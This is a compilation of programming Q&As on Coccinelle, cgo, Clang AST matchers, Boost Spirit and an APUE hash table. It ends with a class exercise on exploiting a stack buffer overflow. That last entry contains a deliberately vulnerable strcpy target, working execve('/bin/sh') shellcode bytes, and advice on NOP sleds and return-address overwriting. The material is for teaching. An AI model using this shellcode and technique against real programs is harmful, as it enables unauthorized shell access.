Coccinelle: replacing a function that takes variable arguments

I have something like this:
int test_fn(int a, ...)
{
    /* ... */
}
int main(int argc, char *argv[])
{
    int b, a1, a2, a3;
    /* ... */
    b = test_fn(a1,a2,a3);
    return 0;
}
I want to replace test_fn with a different function, func_1. Both test_fn and func_1 take variable arguments.
What I want is
test_fn(a1,a2,a3)// to be replaced by
func_1(x1,a2,a3)
i.e., I want to replace the first argument with a different one and keep all the other arguments.
I'm brand new to Coccinelle, and after a bit of googling I came up with this:
@@
expression E;
identifier test_fn;
@@
-test_fn(E, ...)
+func_1(x)
I'm not sure how to carry the variable arguments over, though. Any help would be appreciated.
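On the SmPL side, and untested here: as far as I know, Coccinelle's `expression list` metavariable is the usual way to carry the remaining arguments across (declare `expression E; expression list ES;`, then write `- test_fn(E, ES)` / `+ func_1(x1, ES)`). Also note that declaring `test_fn` as an `identifier` metavariable, as in the attempt above, makes the rule match calls to any function rather than only `test_fn`. As a plain-C point of comparison only (not a Coccinelle rule), the preprocessor can perform the same call-site rewrite at compile time with a variadic macro. The body of `func_1` and the value of `x1` below are hypothetical stand-ins, since the question shows neither.

```c
#include <assert.h>
#include <stdarg.h>

/* Hypothetical stand-ins: x1 is a constant, and func_1 treats its first
 * argument as the count of int arguments that follow, returning their sum. */
enum { x1 = 2 };

int func_1(int count, ...)
{
    va_list ap;
    int sum = 0;

    assert(count >= 0);
    va_start(ap, count);
    for (int i = 0; i < count; i++)
        sum += va_arg(ap, int);
    va_end(ap);
    return sum;
}

/* Compile-time analogue of the desired rewrite: the first argument of each
 * test_fn(...) call is dropped, x1 takes its place, and the remaining
 * arguments are forwarded unchanged through __VA_ARGS__.
 * This needs at least one argument after the first. */
#define test_fn(first, ...) func_1(x1, __VA_ARGS__)
```

With this macro in scope, `test_fn(a1,a2,a3)` compiles as `func_1(x1,a2,a3)`. The macro only changes what gets compiled and leaves the source text untouched, which is why a semantic patch is the better fit when the goal is to rewrite the code itself.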


How do I pass a C string from a C routine to a Go function (and convert it to a Go string)?

This must be something really silly and basic, but the cgo docs (and my Google-fu) have left me stranded. Here's what I am trying to do: I want a Go function to call a C function using 'import "C"'. That C function needs to store the address of a C string (malloc'd or constant; neither has worked for me) into an argument passed to it as *C.char. The Go function then needs to convert this to a Go string. It actually does work, except I get this:
panic: runtime error: cgo argument has Go pointer to Go pointer
If I run with GODEBUG=cgocheck=0, it all works fine. If I leave it at the default:
strptr = 4e1cbf ('this is a C string!')
main: yylex returned token 1
yylval.tstrptr 4e1cbf
stringval token "this is a C string!"
The problematic line seems to be:
yylval.stringval = C.GoString(yylval.tstrptr)
What little I could find about C.GoString left me with the impression that it allocates a Go string and fills it in from the C string provided, but that seems not to be the case; otherwise, why would I get a complaint about 'Go pointer to Go pointer'? I've tried a number of other approaches, like having the C function malloc the buffer and the Go function call C.free() on it. Nothing has worked (where worked == avoiding this runtime panic).
The Go source:
package main
import (
"fmt"
"unsafe"
)
// #include <stdio.h>
// int yylex (void * foo, void *tp);
import "C"
type foo_t struct {
i int32
s string
}
var foo foo_t
func main() {
var retval int
var s string
var tp *C.char
for i := 0; i < 2; i++ {
retval = int(C.yylex(unsafe.Pointer(&foo), unsafe.Pointer(&tp)))
fmt.Printf("main: yylex returned %d\n", retval)
fmt.Printf("tp = %x\n", tp)
if retval == 0 {
s = C.GoString(tp)
fmt.Printf("foo.i = %d s = %q\n", foo.i, s)
} else {
foo.s = C.GoString(tp)
fmt.Printf("foo.i = %d foo.s = %q\n", foo.i, foo.s)
}
}
}
The C source:
#include <stdio.h>
int yylex (int * foo, char ** tp)
{
static int num;
*foo = 666;
*tp = "this is a C string!";
printf ("strptr = %p ('%s')\n", (void *)*tp, *tp);
return (num++);
}
What's interesting is that if the Go function stores into foo.s first, the second call to yylex panics. If I do s first and then foo.s (depending on whether I check retval for 0 or non-zero), it doesn't fail, but I'm guessing that is because the Go function exits right away and there are no subsequent calls to yylex.

Building call graphs using the Clang AST: linking parameters to arguments

I am trying to build call graphs using Clang AST.
Is there a way to somehow link the parameters of a function to the arguments of an inner function call?
For example, given the following function:
void chainedIncrement(int *ptr) {
simplePointerIncr(ptr);
for (int i=0;i<3;i++) {
simplePointerIncr(ptr);
}
}
I am looking for a way to link ptr in chainedIncrement to the argument of the simplePointerIncr calls. Doing this would allow me to build a call graph.
Maybe there is a way of getting the same id while calling getId() on parameters and arguments.
I tried to use the following AST matcher:
functionDecl(hasDescendant(callExpr(callee(functionDecl().bind("calleeFunc")),unless(isExpansionInSystemHeader())).bind("callExpr"))).bind("outerFunc")
It seems that arguments are of type Expr while function parameters are of type ParmVarDecl.
Assuming that the parameter is passed as-is, without modification to an inner function, is there a way to link them somehow?
Thanks
UPDATE: Added my solution
There is a matcher called forEachArgumentWithParam(). It binds each argument of a call to the corresponding parameter of the callee.
Another matcher, equalsBoundNode(), then matches the parameters of the outer function against the variables passed as arguments to the callee.
auto calleeArgVarDecl = declRefExpr(to(varDecl().bind("callerArg")));
auto innerCallExpr = callExpr(
    forEachArgumentWithParam(calleeArgVarDecl, parmVarDecl().bind("calleeParam")),
    callee(functionDecl().bind("calleeFunc")),
    unless(isExpansionInSystemHeader())).bind("callExpr");
auto fullMatcher = functionDecl(
    forEachDescendant(innerCallExpr),
    forEachDescendant(parmVarDecl(equalsBoundNode("callerArg")).bind("outerFuncParam"))).bind("outerFunc");
Here is a simplified example:
int add2(int var) {
return var+2;
}
int caller(int var) {
add2(var);
for (int i=0; i<3; i++) {
add2(var);
}
return var;
}
int main(int argc, const char **argv) {
int ret = 0;
caller(ret);
return 0;
}
Using clang-query to show the matcher result:
clang-query> match callExpr(hasAnyArgument(hasAncestor(functionDecl(hasName("caller")))))
Match #1:
~/main.cpp:5:3: note: "root" binds here
add2(var);
^~~~~~~~~
Match #2:
~/main.cpp:7:5: note: "root" binds here
add2(var);
^~~~~~~~~
2 matches.
In this example, it matches both calls to add2 inside caller, each of which passes caller's parameter var.

Case Insensitive String Comparison of Boost::Spirit Token Text in Semantic Action

I've got a tokeniser and a parser. The parser has a special token type, KEYWORD, for keywords (there are about 50). In my parser I want to ensure that the tokens are what I'd expect, so I've got a rule for each, like so:
KW_A = tok.KEYWORDS[_pass = (_1 == "A")];
KW_B = tok.KEYWORDS[_pass = (_1 == "B")];
KW_C = tok.KEYWORDS[_pass = (_1 == "C")];
This works well enough, but it's not case insensitive (and the grammar I'm trying to handle is!). I'd like to use boost::iequals, but attempts to convert _1 to an std::string result in the following error:
error: no viable conversion from 'const _1_type' (aka 'const actor<argument<0> >') to 'std::string' (aka 'basic_string<char>')
How can I treat these keywords as strings and ensure they're the expected text irrespective of case?
A little learning went a long way. I added the following to my lexer:
struct normalise_keyword_impl
{
template <typename Value>
struct result
{
typedef void type;
};
template <typename Value>
void operator()(Value const& val) const
{
// This modifies the original input string.
typedef boost::iterator_range<std::string::iterator> iterpair_type;
iterpair_type const& ip = boost::get<iterpair_type>(val);
std::for_each(ip.begin(), ip.end(),
[](char& in)
{
in = std::toupper(in);
});
}
};
boost::phoenix::function<normalise_keyword_impl> normalise_keyword;
// The rest...
};
I then used Phoenix to bind the action to the KEYWORD token in my constructor, like so:
this->self =
KEYWORD [normalise_keyword(_val)]
// The rest...
;
Although this accomplishes what I was after, it modifies the original input sequence. Is there some modification I could make so that I could use const_iterator instead of iterator, and avoid modifying my input sequence?
I tried returning an std::string copied from ip.begin() to ip.end() and uppercased using boost::toupper(...), assigning that to _val. Although it compiled and ran, there were clearly some problems with what it was producing:
Enter a sequence to be tokenised: select a from b
Input is 'select a from b'.
result is SELECT
Token: 0: KEYWORD ('KEYWOR')
Token: 1: REGULAR_IDENTIFIER ('a')
result is FROM
Token: 0: KEYWORD ('KEYW')
Token: 1: REGULAR_IDENTIFIER ('b')
Very peculiar, it appears I have some more learning to do.
Final Solution
Okay, I ended up using this function:
struct normalise_keyword_impl
{
template <typename Value>
struct result
{
typedef std::string type;
};
template <typename Value>
std::string operator()(Value const& val) const
{
// Copy the token and update the attribute value.
typedef boost::iterator_range<std::string::const_iterator> iterpair_type;
iterpair_type const& ip = boost::get<iterpair_type>(val);
auto result = std::string(ip.begin(), ip.end());
result = boost::to_upper_copy(result);
return result;
}
};
And this semantic action:
KEYWORD [_val = normalise_keyword(_val)]
Together with a modified token_type (this is what sorted things out):
typedef std::string::const_iterator base_iterator;
typedef boost::spirit::lex::lexertl::token<base_iterator, boost::mpl::vector<std::string> > token_type;
typedef boost::spirit::lex::lexertl::actor_lexer<token_type> lexer_type;
typedef type_system::Tokens<lexer_type> tokens_type;
typedef tokens_type::iterator_type iterator_type;
typedef type_system::Grammar<iterator_type> grammar_type;
// Establish our lexer and our parser.
tokens_type lexer;
grammar_type parser(lexer);
// ...
The important addition is boost::mpl::vector<std::string>. The result:
Enter a sequence to be tokenised: select a from b
Input is 'select a from b'.
Token: 0: KEYWORD ('SELECT')
Token: 1: REGULAR_IDENTIFIER ('a')
Token: 0: KEYWORD ('FROM')
Token: 1: REGULAR_IDENTIFIER ('b')
I have no idea why this has corrected the problem so if someone could chime in with their expertise, I'm a willing student.
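Not Spirit code, and not what the asker ended up with: a plain-C sketch of the idea behind a non-mutating keyword check, namely comparing the token's character range case-insensitively against the expected keyword, without copying or uppercasing the input. `range_iequals` is a hypothetical helper name, and case folding uses `toupper` in the current C locale (plain ASCII by default). On the C++ side, my understanding is that `boost::algorithm::iequals` accepts ranges, so it could be applied to the token's iterator_range directly, but that is untested here.

```c
#include <assert.h>
#include <ctype.h>
#include <stdbool.h>

/* Compare the token text [begin, end) with a NUL-terminated keyword,
 * ignoring case. Nothing is copied and the input is never modified. */
bool range_iequals(const char *begin, const char *end, const char *keyword)
{
    assert(begin <= end);
    for (; begin != end; ++begin, ++keyword) {
        if (*keyword == '\0')
            return false; /* token is longer than the keyword */
        if (toupper((unsigned char)*begin) != toupper((unsigned char)*keyword))
            return false;
    }
    return *keyword == '\0'; /* keyword must not be longer than the token */
}
```

For example, with the input "select a from b", the range covering the first six characters compares equal to "SELECT" while the input itself still reads "select".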

What are this cast and assignment all about?

I am reading Richard Stevens' Advanced Programming in the UNIX Environment.
There is some code in the thread synchronization chapter (Chapter 11).
It shows how to avoid race conditions when there are many shared structures of the same type.
The code uses two mutexes for synchronization: one (hashlock) for the list fh, which keeps track of all the foo structures, and for the f_next field, and another (f_lock) for each foo structure.
The code is:
#include <stdlib.h>
#include <pthread.h>
#include <stdio.h>
#include <unistd.h>
#define NHASH 29
#define HASH(fp) (((unsigned long)fp)%NHASH)
struct foo *fh[NHASH];
pthread_mutex_t hashlock = PTHREAD_MUTEX_INITIALIZER;
struct foo {
int f_count;
pthread_mutex_t f_lock;
struct foo *f_next; /* protected by hashlock */
int f_id;
/* ... more stuff here ... */
};
struct foo * foo_alloc(void) /* allocate the object */
{
struct foo *fp;
int idx;
if ((fp = malloc(sizeof(struct foo))) != NULL) {
fp->f_count = 1;
if (pthread_mutex_init(&fp->f_lock, NULL) != 0) {
free(fp);
return(NULL);
}
idx = HASH(fp);
pthread_mutex_lock(&hashlock);
///////////////////// HERE -----------------
fp->f_next = fh[idx];
fh[idx] = fp->f_next;
//////////////////// UPTO HERE -------------
pthread_mutex_lock(&fp->f_lock);
pthread_mutex_unlock(&hashlock);
/* ... continue initialization ... */
pthread_mutex_unlock(&fp->f_lock);
}
return(fp);
}
void foo_hold(struct foo *fp) /* add a reference to the object */
.......
My questions are:
1) What is the HASH(fp) macro doing?
I know that it casts the value stored in fp to unsigned long and then takes it modulo NHASH. But in foo_alloc we are just passing the address of the newly allocated foo structure.
Why are we doing this? I know this gives me an integer between 0 and 28 to use as an index into the array fh, but why take the modulo of an address? Why is there so much randomization?
2) Suppose I accept that. What are these two lines (also highlighted in the code) doing after it?
fp->f_next = fh[idx];
fh[idx] = fp->f_next;
I assume fh[idx] initially holds some garbage value, which I assign to the f_next field of foo; then the next line seems to do the same assignment again, but in the opposite order.
struct foo *fh[NHASH] is a hash table, and the HASH macro is its hash function.
1) HASH(fp) calculates the index that decides where in fh to store fp. It uses the address held in fp as the key; the address can simply be cast to unsigned long to compute the index.
2) Hash collisions are handled by chaining entries in a linked list (separate chaining). I think the correct code is the following, which you can check in the book:
fp->f_next = fh[idx];
fh[idx] = fp;
This inserts fp at the head of the linked list fh[idx]. Since fh is a global array, each fh[idx] starts out as NULL, not garbage.
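A minimal sketch of the hash table described above, assuming a simplified struct foo with the mutexes left out so only the chaining is visible; `foo_insert`, `foo_insert_as_quoted` and `foo_in_table` are hypothetical helper names, not the book's functions. The hash is not randomization: the same address always lands in the same bucket. Addresses returned by malloc are typically multiples of 8 or 16, and since 29 is prime it shares no factor with them, so such addresses still spread across all 29 buckets.

```c
#include <assert.h>
#include <stdlib.h> /* malloc/free for callers of these helpers */

#define NHASH 29
/* Same hash as the book: the object's address, reduced modulo NHASH. */
#define HASH(fp) (((unsigned long)(fp)) % NHASH)

/* Simplified struct foo: mutexes omitted to show only the chaining. */
struct foo {
    int f_id;
    struct foo *f_next;
};

struct foo *fh[NHASH]; /* global array, so every bucket starts out NULL */

/* Corrected insertion: push fp onto the front of its bucket's list. */
void foo_insert(struct foo *fp)
{
    assert(fp != NULL);
    unsigned long idx = HASH(fp);
    fp->f_next = fh[idx]; /* new node points at the old head (maybe NULL) */
    fh[idx] = fp;         /* bucket now starts with the new node */
}

/* The two lines as quoted in the question: fh[idx] gets its own old value
 * back, so fp is never linked into the table. */
void foo_insert_as_quoted(struct foo *fp)
{
    unsigned long idx = HASH(fp);
    fp->f_next = fh[idx];
    fh[idx] = fp->f_next;
}

/* Walk fp's bucket and report whether fp is reachable from the table. */
int foo_in_table(const struct foo *fp)
{
    for (const struct foo *p = fh[HASH(fp)]; p != NULL; p = p->f_next)
        if (p == fp)
            return 1;
    return 0;
}
```

After `foo_insert(fp)`, walking `fh[HASH(fp)]` reaches fp; after `foo_insert_as_quoted(fp)`, it does not, which is why the second line has to be `fh[idx] = fp;`.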

Intentional buffer overflow exploit program

I'm trying to figure out this problem for one of my computer science classes. I've used every resource I can find and am still having issues, so if someone could provide some insight, I'd greatly appreciate it.
I have this "target" program, and I need to get it to execute execve("/bin/sh") using a buffer overflow exploit. When the unsafe strcpy overflows buf[128], a pointer back into the buffer should end up in the location where the system expects to find the return address.
target.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int bar(char *arg, char *out)
{
strcpy(out,arg);
return 0;
}
int foo(char *argv[])
{
char buf[128];
bar(argv[1], buf);
return 0;
}
int main(int argc, char *argv[])
{
if (argc != 2)
{
fprintf(stderr, "target: argc != 2");
exit(EXIT_FAILURE);
}
foo(argv);
return 0;
}
exploit.c
#include <stdio.h>
#include <unistd.h>
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
shellcode.h
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
I understand I need to fill argv[1] with over 128 bytes, the bytes over 128 being the return address, which should be pointed back to the buffer so it executes the /bin/sh within. Is that correct thus far? Can someone provide the next step?
Thanks very much for any help.
Well, so you want the program to execute your shellcode. It's already in machine form, so it's ready to be executed by the system. You've stored it in a buffer. So, the question would be "How does the system know to execute my code?" More precisely, "How does the system know where to look for the next code to be executed?" The answer in this case is the return address you're talking about.
Basically, you're on the right track. Have you tried executing the code? One thing I've noticed when performing this type of exploit is that it's not an exact science. Sometimes, there are other things in memory that you don't expect to be there, so you have to increase the number of bytes you add into your buffer in order to correctly align the return address with where the system expects it to be.
I'm not a specialist in security, but I can tell you a few things that might help. One is that I usually include a 'NOP Sled' - essentially just a series of 0x90 bytes that don't do anything other than execute 'NOP' instructions on the processor. Another trick is to repeat the return address at the end of the buffer, so that if even one of them overwrites the return address on the stack, you'll have a successful return to where you want.
So, your buffer will look like this:
| NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS |
(Note: These aren't my ideas, I got them from Hacking: The Art of Exploitation, by Jon Erickson. I recommend this book if you're interested in learning more about this).
To calculate the address, you can use something similar to the following:
unsigned long sp(void)
{ __asm__("movl %esp, %eax");} // returns the address of the stack pointer
int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char* buffer;
offset = 0;
esp = sp();
ret = esp - offset;
}
Now, ret will hold the return address you want to return to, assuming that you allocate buffer to be on the heap.
